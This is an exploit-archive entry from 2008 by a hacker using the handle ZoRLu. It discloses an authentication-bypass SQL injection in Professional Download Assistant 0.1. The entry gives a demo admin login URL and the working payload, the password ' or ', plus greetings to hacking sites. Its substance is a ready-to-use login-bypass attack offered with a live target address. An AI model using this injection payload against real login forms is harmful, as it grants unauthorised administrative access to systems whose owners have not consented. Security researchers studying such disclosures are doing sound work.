[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Professional Download Assistant 0.1 (Auth Bypass) SQL Injection Vuln
# Published : 2008-12-09
# Author : ZoRLu
# Previous Title : phpAddEdit 1.3 (editform) Local File Inclusion Vulnerability
# Next Title : Poll Pro 2.0 (Auth Bypass) Remote SQL Injection Vulnerability


[~] Professional Download Assistant 0.1 Bypass
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu   msn: trt-turk@hotmail.com
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] Date: 08/12/2008
[~]
[~] N0T: TUM iSLAM ALEMiNiN BAYRAMINI KUTLARIM...!
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~] -----------------------------------------------------------

exp for demo: 

http://www.dotnetindex.com/demos/prodownloadmanager/admin/

user: ZoRLu

passwd: ' or '

[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke 
[~]
[~] yildirimordulari.org  &  darkc0de.com
[~]
[~]----------------------------------------------------------------------

# www.Syue.com [2008-12-09]